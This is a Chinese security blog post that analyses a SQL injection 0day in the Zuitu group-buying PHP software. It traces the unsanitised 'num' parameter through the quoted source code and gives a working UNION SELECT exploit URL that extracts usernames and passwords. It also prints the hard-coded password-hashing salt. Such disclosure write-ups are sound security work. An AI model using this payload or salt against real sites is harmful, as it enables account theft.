您的位置 » 首页 » 代码审计 » 漏洞分析:关于知道创宇截获的那个最土0day

漏洞分析:关于知道创宇截获的那个最土0day

发表于5年前 | 作者: seay | 分类: 代码审计 | 孵化于:2012年12月25日 | 文章热度:8,380 次 全屏阅读

显示不全请点击全屏阅读

前天在微博上看到知道创宇发出的最土团购0day,前天晚上下了源码看了下,由于只是针对微博上截图看的,应该分析的不全面。
先看页面:./include/library/DB.class.php,代码如下:
 
—————code—————–
    static public function GetDbRowById($table, $ids=array()) { 
        $one = is_array($ids) ? false : true;
        settype($ids, ‘array’);
                //var_dump($ids);
        $idstring = join(‘\’,\”, $ids);
                            
        if(preg_match(‘/[\s]/’, $idstring)) return array();//不可以有空格,用/**/代替 
        $q = “SELECT * FROM `{$table}` WHERE id IN (‘{$idstring}’)”;
                //var_dump($q);
        $r = self::GetQueryResult($q, $one);//没有过滤,直接查询了
        if ($one) return $r;
        return Utility::AssColumn($r, ‘id’);
    }
——————code—————
然后搜索函数GetDbRowById(),发现只有在文件:./include/library/Table.class.php中有调用,代码如下:
 
 
——————–code0————–
    static private function _Fetch($n=null, $ids=array()) {
        $r = Cache::GetObject($n, $ids);
        $diff = array_diff($ids, array_keys($r));
        if(!$diff) return $r;
        $rr = DB::GetDbRowById($n, array_values($diff));
        Cache::SetObject($n, $rr);
        $r = array_merge($r, $rr);
        return Utility::SortArray($r, $ids, ‘id’);
    }
           
    static public function FetchForce($n=null, $ids=array()) {
        if ( empty($ids) || !$ids ) return array();
        $single = is_array($ids) ? false : true;
        settype($ids, ‘array’); $ids = array_values($ids);
        $ids = array_diff($ids, array(NULL));
                //var_dump($ids);
           
        $r = DB::GetDbRowById($n, $ids);
                //var_dump($r);
        Cache::SetObject($n, $r);
        return $single ? array_pop($r):Utility::SortArray($r,$ids,’id’); 
    }   
———————-code———————
然后跟踪搜索函数static public function FetchForce(),发现有很多页面都有调用。

 
 
刚开始的时候随便找了个页面看,结果不爆错,不过从输出的调试语句看,确实是可以注入。既然不能爆错,就只能找可以显示结果的页面来联合查询了。找到页面./api/call.php,部分代码如下:
 —————–code————–
<?php
require_once(dirname(dirname(__FILE__)) . ‘/app.php’);
        
$action = strval($_GET[‘action’]);
$callerid = strval($_GET[‘callerid’]);
$cid = strval($_GET[‘num’]);//这里是外界提交的数据
$sec = strval($_GET[‘secret’]);
$allow = array(‘query’,’consume’);
if (false==in_array($action, $allow))  redirect(WEB_ROOT . ‘/index.php’); 
        
header(‘Content-Type: application/xml; charset=UTF-8’);
//优惠券查询
if($action == ‘query’) {
    $coupon = Table::FetchForce(‘coupon’, $cid);
    $partner = Table::Fetch(‘partner’, $coupon[‘partner_id’]);
    $team = Table::Fetch(‘team’, $coupon[‘team_id’]);
    $e = date(‘Y-m-d’, $team[‘expire_time’]);
…..
…..
…..
————code—————————
利用语句:
 
http://www.2cto.com /api/call.php?action=query&num=123’%29/**/union/**/select/**/1,2,3,concat(0x7e,0x27,username,0x7e,0x27,password),5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/user/**/limit/**/0,1%23
不过密码有点坑,加了SECRET_KEY的。页面./include/classes/ZUser.class.php,代码如下:
 
 
———————-code————–
    const SECRET_KEY = ‘@4!@#$%@’;
        
    static public function GenPassword($p) { 
        return md5($p . self::SECRET_KEY);
    }
—————code———————
 
作者:qingsh4n

Tags:

漏洞分析,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1937/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)